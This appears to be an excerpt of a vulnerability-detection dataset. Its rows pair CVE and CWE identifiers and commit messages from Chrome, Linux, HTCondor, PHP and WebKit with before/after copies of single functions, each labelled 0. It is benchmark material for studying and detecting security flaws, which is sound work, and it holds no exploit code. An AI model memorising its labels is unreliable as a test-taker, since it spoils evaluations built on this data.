window_background_view_->SetSize(larger_window_bounds.size());
window_background_view_->SetPaintToLayer(ui::LAYER_SOLID_COLOR);
GetWindowBackgroundLayer()->SetColor(SK_ColorBLACK);
controls_scrim_view_->SetSize(GetBounds().size());
controls_scrim_view_->SetPaintToLayer(ui::LAYER_SOLID_COLOR);
GetControlsScrimLayer()->SetColor(gfx::kGoogleGrey900);
GetControlsScrimLayer()->SetOpacity(0.43f);
controls_parent_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
controls_parent_view_->SetSize(GetBounds().size());
controls_parent_view_->layer()->SetFillsBoundsOpaquely(false);
controls_parent_view_->set_owned_by_client();
close_controls_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
close_controls_view_->layer()->SetFillsBoundsOpaquely(false);
close_controls_view_->set_owned_by_client();
video_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
play_pause_controls_view_->SetImageAlignment(
views::ImageButton::ALIGN_CENTER, views::ImageButton::ALIGN_MIDDLE);
play_pause_controls_view_->SetToggled(controller_->IsPlayerActive());
play_pause_controls_view_->set_owned_by_client();
#if defined(OS_CHROMEOS)
resize_handle_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
resize_handle_view_->layer()->SetFillsBoundsOpaquely(false);
resize_handle_view_->set_owned_by_client();
#endif
play_pause_controls_view_->SetFocusForPlatform(); // Make button focusable.
const base::string16 play_pause_accessible_button_label(
l10n_util::GetStringUTF16(
IDS_PICTURE_IN_PICTURE_PLAY_PAUSE_CONTROL_ACCESSIBLE_TEXT));
play_pause_controls_view_->SetAccessibleName(
play_pause_accessible_button_label);
const base::string16 play_button_label(
l10n_util::GetStringUTF16(IDS_PICTURE_IN_PICTURE_PLAY_CONTROL_TEXT));
play_pause_controls_view_->SetTooltipText(play_button_label);
const base::string16 pause_button_label(
l10n_util::GetStringUTF16(IDS_PICTURE_IN_PICTURE_PAUSE_CONTROL_TEXT));
play_pause_controls_view_->SetToggledTooltipText(pause_button_label);
play_pause_controls_view_->SetInstallFocusRingOnFocus(true);
controls_parent_view_->AddChildView(play_pause_controls_view_.get());
GetContentsView()->AddChildView(controls_scrim_view_.get());
GetContentsView()->AddChildView(controls_parent_view_.get());
GetContentsView()->AddChildView(close_controls_view_.get());
#if defined(OS_CHROMEOS)
GetContentsView()->AddChildView(resize_handle_view_.get());
#endif
UpdatePlayPauseControlsSize();
UpdateControlsVisibility(false);
}
|
void OverlayWindowViews::SetUpViews() {
gfx::Rect larger_window_bounds = GetBounds();
larger_window_bounds.Inset(-1, -1);
window_background_view_->SetSize(larger_window_bounds.size());
window_background_view_->SetPaintToLayer(ui::LAYER_SOLID_COLOR);
GetWindowBackgroundLayer()->SetColor(SK_ColorBLACK);
controls_scrim_view_->SetSize(GetBounds().size());
controls_scrim_view_->SetPaintToLayer(ui::LAYER_SOLID_COLOR);
GetControlsScrimLayer()->SetColor(gfx::kGoogleGrey900);
GetControlsScrimLayer()->SetOpacity(0.43f);
controls_parent_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
controls_parent_view_->SetSize(GetBounds().size());
controls_parent_view_->layer()->SetFillsBoundsOpaquely(false);
controls_parent_view_->set_owned_by_client();
close_controls_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
close_controls_view_->layer()->SetFillsBoundsOpaquely(false);
close_controls_view_->set_owned_by_client();
video_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
play_pause_controls_view_->SetImageAlignment(
views::ImageButton::ALIGN_CENTER, views::ImageButton::ALIGN_MIDDLE);
play_pause_controls_view_->SetToggled(controller_->IsPlayerActive());
play_pause_controls_view_->set_owned_by_client();
#if defined(OS_CHROMEOS)
resize_handle_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
resize_handle_view_->layer()->SetFillsBoundsOpaquely(false);
resize_handle_view_->set_owned_by_client();
#endif
play_pause_controls_view_->SetFocusForPlatform(); // Make button focusable.
const base::string16 play_pause_accessible_button_label(
l10n_util::GetStringUTF16(
IDS_PICTURE_IN_PICTURE_PLAY_PAUSE_CONTROL_ACCESSIBLE_TEXT));
play_pause_controls_view_->SetAccessibleName(
play_pause_accessible_button_label);
const base::string16 play_button_label(
l10n_util::GetStringUTF16(IDS_PICTURE_IN_PICTURE_PLAY_CONTROL_TEXT));
play_pause_controls_view_->SetTooltipText(play_button_label);
const base::string16 pause_button_label(
l10n_util::GetStringUTF16(IDS_PICTURE_IN_PICTURE_PAUSE_CONTROL_TEXT));
play_pause_controls_view_->SetToggledTooltipText(pause_button_label);
play_pause_controls_view_->SetInstallFocusRingOnFocus(true);
controls_parent_view_->AddChildView(play_pause_controls_view_.get());
GetContentsView()->AddChildView(controls_scrim_view_.get());
GetContentsView()->AddChildView(controls_parent_view_.get());
GetContentsView()->AddChildView(close_controls_view_.get());
#if defined(OS_CHROMEOS)
GetContentsView()->AddChildView(resize_handle_view_.get());
#endif
UpdatePlayPauseControlsSize();
UpdateControlsVisibility(false);
}
|
C
|
Chrome
| 0 |
CVE-2018-6034
|
https://www.cvedetails.com/cve/CVE-2018-6034/
|
CWE-125
|
https://github.com/chromium/chromium/commit/3298d3abf47b3a7a10e44c07d821c68a5c8aa935
|
3298d3abf47b3a7a10e44c07d821c68a5c8aa935
|
Tighten about IntRect use in WebGL with overflow detection
BUG=784183
TEST=test case in the bug in ASAN build
R=kbr@chromium.org
Cq-Include-Trybots: master.tryserver.chromium.android:android_optional_gpu_tests_rel;master.tryserver.chromium.linux:linux_optional_gpu_tests_rel;master.tryserver.chromium.mac:mac_optional_gpu_tests_rel;master.tryserver.chromium.win:win_optional_gpu_tests_rel
Change-Id: Ie25ca328af99de7828e28e6a6e3d775f1bebc43f
Reviewed-on: https://chromium-review.googlesource.com/811826
Reviewed-by: Kenneth Russell <kbr@chromium.org>
Commit-Queue: Zhenyao Mo <zmo@chromium.org>
Cr-Commit-Position: refs/heads/master@{#522213}
|
int WebGLRenderingContextBase::ExternallyAllocatedBufferCountPerPixel() {
if (isContextLost())
return 0;
int buffer_count = 1;
buffer_count *= 2; // WebGL's front and back color buffers.
int samples = GetDrawingBuffer() ? GetDrawingBuffer()->SampleCount() : 0;
Nullable<WebGLContextAttributes> attribs;
getContextAttributes(attribs);
if (!attribs.IsNull()) {
if (attribs.Get().antialias() && samples > 0 &&
GetDrawingBuffer()->ExplicitResolveOfMultisampleData()) {
if (attribs.Get().depth() || attribs.Get().stencil())
buffer_count += samples; // depth/stencil multisample buffer
buffer_count += samples; // color multisample buffer
} else if (attribs.Get().depth() || attribs.Get().stencil()) {
buffer_count += 1; // regular depth/stencil buffer
}
}
return buffer_count;
}
|
int WebGLRenderingContextBase::ExternallyAllocatedBufferCountPerPixel() {
if (isContextLost())
return 0;
int buffer_count = 1;
buffer_count *= 2; // WebGL's front and back color buffers.
int samples = GetDrawingBuffer() ? GetDrawingBuffer()->SampleCount() : 0;
Nullable<WebGLContextAttributes> attribs;
getContextAttributes(attribs);
if (!attribs.IsNull()) {
if (attribs.Get().antialias() && samples > 0 &&
GetDrawingBuffer()->ExplicitResolveOfMultisampleData()) {
if (attribs.Get().depth() || attribs.Get().stencil())
buffer_count += samples; // depth/stencil multisample buffer
buffer_count += samples; // color multisample buffer
} else if (attribs.Get().depth() || attribs.Get().stencil()) {
buffer_count += 1; // regular depth/stencil buffer
}
}
return buffer_count;
}
|
C
|
Chrome
| 0 |
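Editor's note on the entry above: the commit adds overflow detection around IntRect arithmetic in WebGL; the function shown in the row is surrounding context rather than the overflow check itself. A hedged sketch of checked size arithmetic in C follows, using the GCC/Clang __builtin overflow intrinsics (Chromium itself uses its CheckedNumeric types rather than these intrinsics):

#include <stdint.h>
#include <stdio.h>

/* Compute width * height * bytes_per_pixel, failing cleanly on overflow
 * instead of wrapping around and under-allocating a buffer. */
static int checked_image_bytes(uint32_t w, uint32_t h, uint32_t bpp, uint64_t *out)
{
    uint64_t pixels, bytes;
    if (__builtin_mul_overflow((uint64_t)w, (uint64_t)h, &pixels))
        return -1;
    if (__builtin_mul_overflow(pixels, (uint64_t)bpp, &bytes))
        return -1;
    *out = bytes;
    return 0;
}

int main(void)
{
    uint64_t n;
    if (checked_image_bytes(0xFFFFFFFFu, 0xFFFFFFFFu, 4, &n) < 0)
        puts("rejected: size computation overflows");
    return 0;
}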
CVE-2013-6626
|
https://www.cvedetails.com/cve/CVE-2013-6626/
| null |
https://github.com/chromium/chromium/commit/90fb08ed0146c9beacfd4dde98a20fc45419fff3
|
90fb08ed0146c9beacfd4dde98a20fc45419fff3
|
Cancel JavaScript dialogs when an interstitial appears.
BUG=295695
TEST=See bug for repro steps.
Review URL: https://chromiumcodereview.appspot.com/24360011
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@225026 0039d316-1c4b-4281-b951-d872f2087c98
|
void WebContentsImpl::OnSavePage() {
if (!IsSavable()) {
RecordDownloadSource(INITIATED_BY_SAVE_PACKAGE_ON_NON_HTML);
SaveFrame(GetURL(), Referrer());
return;
}
Stop();
save_package_ = new SavePackage(this);
save_package_->GetSaveInfo();
}
|
void WebContentsImpl::OnSavePage() {
if (!IsSavable()) {
RecordDownloadSource(INITIATED_BY_SAVE_PACKAGE_ON_NON_HTML);
SaveFrame(GetURL(), Referrer());
return;
}
Stop();
save_package_ = new SavePackage(this);
save_package_->GetSaveInfo();
}
|
C
|
Chrome
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/dc3857aac17be72c96f28d860d875235b3be349a
|
dc3857aac17be72c96f28d860d875235b3be349a
|
Unreviewed, rolling out r142736.
http://trac.webkit.org/changeset/142736
https://bugs.webkit.org/show_bug.cgi?id=109716
Broke ABI, nightly builds crash on launch (Requested by ap on
#webkit).
Patch by Sheriff Bot <webkit.review.bot@gmail.com> on 2013-02-13
Source/WebKit2:
* Shared/APIClientTraits.cpp:
(WebKit):
* Shared/APIClientTraits.h:
* UIProcess/API/C/WKPage.h:
* UIProcess/API/gtk/WebKitLoaderClient.cpp:
(attachLoaderClientToView):
* WebProcess/InjectedBundle/API/c/WKBundlePage.h:
* WebProcess/qt/QtBuiltinBundlePage.cpp:
(WebKit::QtBuiltinBundlePage::QtBuiltinBundlePage):
Tools:
* MiniBrowser/mac/WK2BrowserWindowController.m:
(-[WK2BrowserWindowController awakeFromNib]):
* WebKitTestRunner/InjectedBundle/InjectedBundlePage.cpp:
(WTR::InjectedBundlePage::InjectedBundlePage):
* WebKitTestRunner/TestController.cpp:
(WTR::TestController::createWebViewWithOptions):
git-svn-id: svn://svn.chromium.org/blink/trunk@142762 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
WKURLRequestRef InjectedBundlePage::willSendRequestForFrame(WKBundlePageRef page, WKBundleFrameRef frame, uint64_t identifier, WKURLRequestRef request, WKURLResponseRef redirectResponse, const void* clientInfo)
{
return static_cast<InjectedBundlePage*>(const_cast<void*>(clientInfo))->willSendRequestForFrame(page, frame, identifier, request, redirectResponse);
}
|
WKURLRequestRef InjectedBundlePage::willSendRequestForFrame(WKBundlePageRef page, WKBundleFrameRef frame, uint64_t identifier, WKURLRequestRef request, WKURLResponseRef redirectResponse, const void* clientInfo)
{
return static_cast<InjectedBundlePage*>(const_cast<void*>(clientInfo))->willSendRequestForFrame(page, frame, identifier, request, redirectResponse);
}
|
C
|
Chrome
| 0 |
CVE-2014-2038
|
https://www.cvedetails.com/cve/CVE-2014-2038/
|
CWE-20
|
https://github.com/torvalds/linux/commit/263b4509ec4d47e0da3e753f85a39ea12d1eff24
|
263b4509ec4d47e0da3e753f85a39ea12d1eff24
|
nfs: always make sure page is up-to-date before extending a write to cover the entire page
We should always make sure the cached page is up-to-date when we're
determining whether we can extend a write to cover the full page -- even
if we've received a write delegation from the server.
Commit c7559663 added logic to skip this check if we have a write
delegation, which can lead to data corruption such as the following
scenario if client B receives a write delegation from the NFS server:
Client A:
# echo 123456789 > /mnt/file
Client B:
# echo abcdefghi >> /mnt/file
# cat /mnt/file
0�D0�abcdefghi
Just because we hold a write delegation doesn't mean that we've read in
the entire page contents.
Cc: <stable@vger.kernel.org> # v3.11+
Signed-off-by: Scott Mayhew <smayhew@redhat.com>
Signed-off-by: Trond Myklebust <trond.myklebust@primarydata.com>
|
int nfs_wb_page(struct inode *inode, struct page *page)
{
loff_t range_start = page_file_offset(page);
loff_t range_end = range_start + (loff_t)(PAGE_CACHE_SIZE - 1);
struct writeback_control wbc = {
.sync_mode = WB_SYNC_ALL,
.nr_to_write = 0,
.range_start = range_start,
.range_end = range_end,
};
int ret;
trace_nfs_writeback_page_enter(inode);
for (;;) {
wait_on_page_writeback(page);
if (clear_page_dirty_for_io(page)) {
ret = nfs_writepage_locked(page, &wbc);
if (ret < 0)
goto out_error;
continue;
}
ret = 0;
if (!PagePrivate(page))
break;
ret = nfs_commit_inode(inode, FLUSH_SYNC);
if (ret < 0)
goto out_error;
}
out_error:
trace_nfs_writeback_page_exit(inode, ret);
return ret;
}
|
int nfs_wb_page(struct inode *inode, struct page *page)
{
loff_t range_start = page_file_offset(page);
loff_t range_end = range_start + (loff_t)(PAGE_CACHE_SIZE - 1);
struct writeback_control wbc = {
.sync_mode = WB_SYNC_ALL,
.nr_to_write = 0,
.range_start = range_start,
.range_end = range_end,
};
int ret;
trace_nfs_writeback_page_enter(inode);
for (;;) {
wait_on_page_writeback(page);
if (clear_page_dirty_for_io(page)) {
ret = nfs_writepage_locked(page, &wbc);
if (ret < 0)
goto out_error;
continue;
}
ret = 0;
if (!PagePrivate(page))
break;
ret = nfs_commit_inode(inode, FLUSH_SYNC);
if (ret < 0)
goto out_error;
}
out_error:
trace_nfs_writeback_page_exit(inode, ret);
return ret;
}
|
C
|
linux
| 0 |
CVE-2012-5135
|
https://www.cvedetails.com/cve/CVE-2012-5135/
|
CWE-399
|
https://github.com/chromium/chromium/commit/b755ebba29dd405d6f1e4cf70f5bc81ffd33b0f6
|
b755ebba29dd405d6f1e4cf70f5bc81ffd33b0f6
|
Guard against the same PrintWebViewHelper being re-entered.
BUG=159165
Review URL: https://chromiumcodereview.appspot.com/11367076
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@165821 0039d316-1c4b-4281-b951-d872f2087c98
|
bool PrintWebViewHelper::InitPrintSettingsAndPrepareFrame(
WebKit::WebFrame* frame,
const WebKit::WebNode& node,
scoped_ptr<PrepareFrameAndViewForPrint>* prepare) {
DCHECK(frame);
bool fit_to_paper_size = !(PrintingNodeOrPdfFrame(frame, node));
if (!InitPrintSettings(fit_to_paper_size)) {
notify_browser_of_print_failure_ = false;
render_view()->RunModalAlertDialog(
frame,
l10n_util::GetStringUTF16(IDS_PRINT_PREVIEW_INVALID_PRINTER_SETTINGS));
return false;
}
DCHECK(!prepare->get());
prepare->reset(new PrepareFrameAndViewForPrint(print_pages_params_->params,
frame, node));
UpdateFrameAndViewFromCssPageLayout(frame, node, prepare->get(),
print_pages_params_->params,
ignore_css_margins_);
Send(new PrintHostMsg_DidGetDocumentCookie(
routing_id(), print_pages_params_->params.document_cookie));
return true;
}
|
bool PrintWebViewHelper::InitPrintSettingsAndPrepareFrame(
WebKit::WebFrame* frame,
const WebKit::WebNode& node,
scoped_ptr<PrepareFrameAndViewForPrint>* prepare) {
DCHECK(frame);
bool fit_to_paper_size = !(PrintingNodeOrPdfFrame(frame, node));
if (!InitPrintSettings(fit_to_paper_size)) {
notify_browser_of_print_failure_ = false;
render_view()->RunModalAlertDialog(
frame,
l10n_util::GetStringUTF16(IDS_PRINT_PREVIEW_INVALID_PRINTER_SETTINGS));
return false;
}
DCHECK(!prepare->get());
prepare->reset(new PrepareFrameAndViewForPrint(print_pages_params_->params,
frame, node));
UpdateFrameAndViewFromCssPageLayout(frame, node, prepare->get(),
print_pages_params_->params,
ignore_css_margins_);
Send(new PrintHostMsg_DidGetDocumentCookie(
routing_id(), print_pages_params_->params.document_cookie));
return true;
}
|
C
|
Chrome
| 0 |
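Editor's note on the entry above: the commit guards against the same PrintWebViewHelper instance being re-entered while a print is already in flight. A minimal sketch of a re-entrancy guard in C (check a flag on entry, clear it on exit); the real fix uses a member flag on the helper object, and the flag here is illustrative only:

#include <stdio.h>

static int print_in_progress = 0;   /* illustrative per-instance flag */

static void start_print(void)
{
    if (print_in_progress) {
        /* Re-entered (e.g. via a nested message loop): bail out early
         * instead of corrupting the in-flight print state. */
        puts("print already in progress, ignoring re-entrant call");
        return;
    }
    print_in_progress = 1;
    puts("printing...");
    print_in_progress = 0;
}

int main(void)
{
    start_print();
    return 0;
}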
CVE-2018-12232
|
https://www.cvedetails.com/cve/CVE-2018-12232/
|
CWE-362
|
https://github.com/torvalds/linux/commit/6d8c50dcb029872b298eea68cc6209c866fd3e14
|
6d8c50dcb029872b298eea68cc6209c866fd3e14
|
socket: close race condition between sock_close() and sockfs_setattr()
fchownat() doesn't even hold refcnt of fd until it figures out
fd is really needed (otherwise is ignored) and releases it after
it resolves the path. This means sock_close() could race with
sockfs_setattr(), which leads to a NULL pointer dereference
since typically we set sock->sk to NULL in ->release().
As pointed out by Al, this is unique to sockfs. So we can fix this
in socket layer by acquiring inode_lock in sock_close() and
checking against NULL in sockfs_setattr().
sock_release() is called in many places, only the sock_close()
path matters here. And fortunately, this should not affect normal
sock_close() as it is only called when the last fd refcnt is gone.
It only affects sock_close() with a parallel sockfs_setattr() in
progress, which is not common.
Fixes: 86741ec25462 ("net: core: Add a UID field to struct sock.")
Reported-by: shankarapailoor <shankarapailoor@gmail.com>
Cc: Tetsuo Handa <penguin-kernel@i-love.sakura.ne.jp>
Cc: Lorenzo Colitti <lorenzo@google.com>
Cc: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
|
struct socket *sock_alloc(void)
{
struct inode *inode;
struct socket *sock;
inode = new_inode_pseudo(sock_mnt->mnt_sb);
if (!inode)
return NULL;
sock = SOCKET_I(inode);
inode->i_ino = get_next_ino();
inode->i_mode = S_IFSOCK | S_IRWXUGO;
inode->i_uid = current_fsuid();
inode->i_gid = current_fsgid();
inode->i_op = &sockfs_inode_ops;
return sock;
}
|
struct socket *sock_alloc(void)
{
struct inode *inode;
struct socket *sock;
inode = new_inode_pseudo(sock_mnt->mnt_sb);
if (!inode)
return NULL;
sock = SOCKET_I(inode);
inode->i_ino = get_next_ino();
inode->i_mode = S_IFSOCK | S_IRWXUGO;
inode->i_uid = current_fsuid();
inode->i_gid = current_fsgid();
inode->i_op = &sockfs_inode_ops;
return sock;
}
|
C
|
linux
| 0 |
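Editor's note on the entry above: the commit closes the race by taking the inode lock in sock_close() and re-checking sock->sk against NULL in sockfs_setattr(). A userspace sketch of the same "re-check the pointer under the lock that the teardown path also holds" pattern, using pthreads (the kernel fix uses inode_lock, not a pthread mutex; the types below are invented):

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>

struct sock_like {
    pthread_mutex_t lock;
    int *sk;                          /* stands in for sock->sk; freed on close */
};

static void close_sock(struct sock_like *s)
{
    pthread_mutex_lock(&s->lock);     /* teardown holds the same lock... */
    free(s->sk);
    s->sk = NULL;
    pthread_mutex_unlock(&s->lock);
}

static int set_owner(struct sock_like *s, int uid)
{
    int ret = -1;
    pthread_mutex_lock(&s->lock);
    if (s->sk) {                      /* ...so this check cannot race with the free */
        *s->sk = uid;
        ret = 0;
    }
    pthread_mutex_unlock(&s->lock);
    return ret;
}

int main(void)
{
    struct sock_like s = { PTHREAD_MUTEX_INITIALIZER, malloc(sizeof(int)) };
    set_owner(&s, 1000);
    close_sock(&s);
    if (set_owner(&s, 1001) < 0)
        puts("setattr after close safely rejected");
    return 0;
}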
CVE-2011-4930
|
https://www.cvedetails.com/cve/CVE-2011-4930/
|
CWE-134
|
https://htcondor-git.cs.wisc.edu/?p=condor.git;a=commitdiff;h=5e5571d1a431eb3c61977b6dd6ec90186ef79867
|
5e5571d1a431eb3c61977b6dd6ec90186ef79867
| null |
GahpClient::gt4_gram_client_job_status(const char * job_contact,
char ** job_status, char ** job_fault, int * exit_code)
{
static const char* command = "GT4_GRAM_JOB_STATUS";
if (server->m_commands_supported->contains_anycase(command)==FALSE) {
return GAHPCLIENT_COMMAND_NOT_SUPPORTED;
}
if (!job_contact) job_contact=NULLSTRING;
std::string reqline;
int x = sprintf(reqline,"%s",escapeGahpString(job_contact));
ASSERT( x > 0 );
const char *buf = reqline.c_str();
if ( !is_pending(command,buf) ) {
if ( m_mode == results_only ) {
return GAHPCLIENT_COMMAND_NOT_SUBMITTED;
}
now_pending(command,buf,normal_proxy);
}
Gahp_Args* result = get_pending_result(command,buf);
if ( result ) {
if (result->argc != 6) {
EXCEPT("Bad %s Result",command);
}
int rc = atoi(result->argv[1]);
if ( strcasecmp( result->argv[2], NULLSTRING ) ) {
*job_status = strdup( result->argv[2] );
} else {
*job_status = NULL;
}
if ( strcasecmp( result->argv[3], NULLSTRING ) ) {
*job_fault = strdup( result->argv[3] );
} else {
*job_fault = NULL;
}
if ( strcasecmp(result->argv[4], NULLSTRING) ) {
*exit_code = atoi( result->argv[4] );
} else {
*exit_code = GT4_NO_EXIT_CODE;
}
if ( strcasecmp(result->argv[5], NULLSTRING) ) {
error_string = result->argv[5];
} else {
error_string = "";
}
delete result;
return rc;
}
if ( check_pending_timeout(command,buf) ) {
sprintf( error_string, "%s timed out", command );
return GAHPCLIENT_COMMAND_TIMED_OUT;
}
return GAHPCLIENT_COMMAND_PENDING;
}
|
GahpClient::gt4_gram_client_job_status(const char * job_contact,
char ** job_status, char ** job_fault, int * exit_code)
{
static const char* command = "GT4_GRAM_JOB_STATUS";
if (server->m_commands_supported->contains_anycase(command)==FALSE) {
return GAHPCLIENT_COMMAND_NOT_SUPPORTED;
}
if (!job_contact) job_contact=NULLSTRING;
std::string reqline;
int x = sprintf(reqline,"%s",escapeGahpString(job_contact));
ASSERT( x > 0 );
const char *buf = reqline.c_str();
if ( !is_pending(command,buf) ) {
if ( m_mode == results_only ) {
return GAHPCLIENT_COMMAND_NOT_SUBMITTED;
}
now_pending(command,buf,normal_proxy);
}
Gahp_Args* result = get_pending_result(command,buf);
if ( result ) {
if (result->argc != 6) {
EXCEPT("Bad %s Result",command);
}
int rc = atoi(result->argv[1]);
if ( strcasecmp( result->argv[2], NULLSTRING ) ) {
*job_status = strdup( result->argv[2] );
} else {
*job_status = NULL;
}
if ( strcasecmp( result->argv[3], NULLSTRING ) ) {
*job_fault = strdup( result->argv[3] );
} else {
*job_fault = NULL;
}
if ( strcasecmp(result->argv[4], NULLSTRING) ) {
*exit_code = atoi( result->argv[4] );
} else {
*exit_code = GT4_NO_EXIT_CODE;
}
if ( strcasecmp(result->argv[5], NULLSTRING) ) {
error_string = result->argv[5];
} else {
error_string = "";
}
delete result;
return rc;
}
if ( check_pending_timeout(command,buf) ) {
sprintf( error_string, "%s timed out", command );
return GAHPCLIENT_COMMAND_TIMED_OUT;
}
return GAHPCLIENT_COMMAND_PENDING;
}
|
CPP
|
htcondor
| 0 |
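Editor's note on the entry above: CVE-2011-4930 is classed as CWE-134 (uncontrolled format string). In the code shown, the timeout message is built as sprintf(error_string, "%s timed out", command), i.e. externally influenced text appears only as a %s argument, never as the format itself. A minimal sketch of the vulnerable versus safe pattern:

#include <stdio.h>

/* Attacker-influenced text must never be the format string: a stray
 * "%s%n" inside it would make printf read from and write through
 * whatever happens to be in the variadic argument slots. */
static void log_bad(const char *untrusted)
{
    printf(untrusted);            /* CWE-134: format string comes from input */
    putchar('\n');
}

static void log_good(const char *untrusted)
{
    printf("%s\n", untrusted);    /* input is only ever data */
}

int main(void)
{
    log_good("job_%x_%n timed out");   /* printed literally, harmless */
    (void)log_bad;                     /* shown for contrast, never called */
    return 0;
}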
CVE-2012-2390
|
https://www.cvedetails.com/cve/CVE-2012-2390/
|
CWE-399
|
https://github.com/torvalds/linux/commit/c50ac050811d6485616a193eb0f37bfbd191cc89
|
c50ac050811d6485616a193eb0f37bfbd191cc89
|
hugetlb: fix resv_map leak in error path
When called for anonymous (non-shared) mappings, hugetlb_reserve_pages()
does a resv_map_alloc(). It depends on code in hugetlbfs's
vm_ops->close() to release that allocation.
However, in the mmap() failure path, we do a plain unmap_region() without
the remove_vma() which actually calls vm_ops->close().
This is a decent fix. This leak could get reintroduced if new code (say,
after hugetlb_reserve_pages() in hugetlbfs_file_mmap()) decides to return
an error. But, I think it would have to unroll the reservation anyway.
Christoph's test case:
http://marc.info/?l=linux-mm&m=133728900729735
This patch applies to 3.4 and later. A version for earlier kernels is at
https://lkml.org/lkml/2012/5/22/418.
Signed-off-by: Dave Hansen <dave@linux.vnet.ibm.com>
Acked-by: Mel Gorman <mel@csn.ul.ie>
Acked-by: KOSAKI Motohiro <kosaki.motohiro@jp.fujitsu.com>
Reported-by: Christoph Lameter <cl@linux.com>
Tested-by: Christoph Lameter <cl@linux.com>
Cc: Andrea Arcangeli <aarcange@redhat.com>
Cc: <stable@vger.kernel.org> [2.6.32+]
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
|
static int vma_has_reserves(struct vm_area_struct *vma)
{
if (vma->vm_flags & VM_MAYSHARE)
return 1;
if (is_vma_resv_set(vma, HPAGE_RESV_OWNER))
return 1;
return 0;
}
|
static int vma_has_reserves(struct vm_area_struct *vma)
{
if (vma->vm_flags & VM_MAYSHARE)
return 1;
if (is_vma_resv_set(vma, HPAGE_RESV_OWNER))
return 1;
return 0;
}
|
C
|
linux
| 0 |
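Editor's note on the entry above: the commit fixes a leak in which an allocation made by hugetlb_reserve_pages() was only released by vm_ops->close(), a hook the mmap() error path never calls, so the fix unwinds the allocation on the function's own error path. A hedged, standalone sketch of that cleanup-on-error structure (the names below are illustrative, not the kernel's):

#include <stdio.h>
#include <stdlib.h>

struct resv_map { long reserved; };

static struct resv_map *resv_map_alloc(void)
{
    return calloc(1, sizeof(struct resv_map));
}

/* Returns 0 on success; on any failure after the allocation, the
 * allocation is released here rather than relying on a close() hook
 * that the caller's error path may never invoke. */
static int reserve_pages(long npages, struct resv_map **out)
{
    struct resv_map *map = resv_map_alloc();
    int err;

    if (!map)
        return -1;

    if (npages < 0) {              /* stand-in for a later failure */
        err = -1;
        goto out_free;
    }

    map->reserved = npages;
    *out = map;
    return 0;

out_free:
    free(map);                     /* the fix: unwind on the error path */
    return err;
}

int main(void)
{
    struct resv_map *m = NULL;
    if (reserve_pages(-1, &m) < 0)
        puts("reservation failed, no leak");
    if (reserve_pages(8, &m) == 0) {
        printf("reserved %ld pages\n", m->reserved);
        free(m);
    }
    return 0;
}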
CVE-2016-9137
|
https://www.cvedetails.com/cve/CVE-2016-9137/
|
CWE-416
|
https://git.php.net/?p=php-src.git;a=commit;h=0e6fe3a4c96be2d3e88389a5776f878021b4c59f
|
0e6fe3a4c96be2d3e88389a5776f878021b4c59f
| null |
ZEND_API void zend_unregister_functions(const zend_function_entry *functions, int count, HashTable *function_table TSRMLS_DC) /* {{{ */
{
const zend_function_entry *ptr = functions;
int i=0;
HashTable *target_function_table = function_table;
if (!target_function_table) {
target_function_table = CG(function_table);
}
while (ptr->fname) {
if (count!=-1 && i>=count) {
break;
}
#if 0
zend_printf("Unregistering %s()\n", ptr->fname);
#endif
zend_hash_del(target_function_table, ptr->fname, strlen(ptr->fname)+1);
ptr++;
i++;
}
}
/* }}} */
|
ZEND_API void zend_unregister_functions(const zend_function_entry *functions, int count, HashTable *function_table TSRMLS_DC) /* {{{ */
{
const zend_function_entry *ptr = functions;
int i=0;
HashTable *target_function_table = function_table;
if (!target_function_table) {
target_function_table = CG(function_table);
}
while (ptr->fname) {
if (count!=-1 && i>=count) {
break;
}
#if 0
zend_printf("Unregistering %s()\n", ptr->fname);
#endif
zend_hash_del(target_function_table, ptr->fname, strlen(ptr->fname)+1);
ptr++;
i++;
}
}
/* }}} */
|
C
|
php
| 0 |
CVE-2017-9059
|
https://www.cvedetails.com/cve/CVE-2017-9059/
|
CWE-404
|
https://github.com/torvalds/linux/commit/c70422f760c120480fee4de6c38804c72aa26bc1
|
c70422f760c120480fee4de6c38804c72aa26bc1
|
Merge tag 'nfsd-4.12' of git://linux-nfs.org/~bfields/linux
Pull nfsd updates from Bruce Fields:
"Another RDMA update from Chuck Lever, and a bunch of miscellaneous
bugfixes"
* tag 'nfsd-4.12' of git://linux-nfs.org/~bfields/linux: (26 commits)
nfsd: Fix up the "supattr_exclcreat" attributes
nfsd: encoders mustn't use unitialized values in error cases
nfsd: fix undefined behavior in nfsd4_layout_verify
lockd: fix lockd shutdown race
NFSv4: Fix callback server shutdown
SUNRPC: Refactor svc_set_num_threads()
NFSv4.x/callback: Create the callback service through svc_create_pooled
lockd: remove redundant check on block
svcrdma: Clean out old XDR encoders
svcrdma: Remove the req_map cache
svcrdma: Remove unused RDMA Write completion handler
svcrdma: Reduce size of sge array in struct svc_rdma_op_ctxt
svcrdma: Clean up RPC-over-RDMA backchannel reply processing
svcrdma: Report Write/Reply chunk overruns
svcrdma: Clean up RDMA_ERROR path
svcrdma: Use rdma_rw API in RPC reply path
svcrdma: Introduce local rdma_rw API helpers
svcrdma: Clean up svc_rdma_get_inv_rkey()
svcrdma: Add helper to save pages under I/O
svcrdma: Eliminate RPCRDMA_SQ_DEPTH_MULT
...
|
__be32 nfsd_splice_read(struct svc_rqst *rqstp,
struct file *file, loff_t offset, unsigned long *count)
{
struct splice_desc sd = {
.len = 0,
.total_len = *count,
.pos = offset,
.u.data = rqstp,
};
int host_err;
rqstp->rq_next_page = rqstp->rq_respages + 1;
host_err = splice_direct_to_actor(file, &sd, nfsd_direct_splice_actor);
return nfsd_finish_read(file, count, host_err);
}
|
__be32 nfsd_splice_read(struct svc_rqst *rqstp,
struct file *file, loff_t offset, unsigned long *count)
{
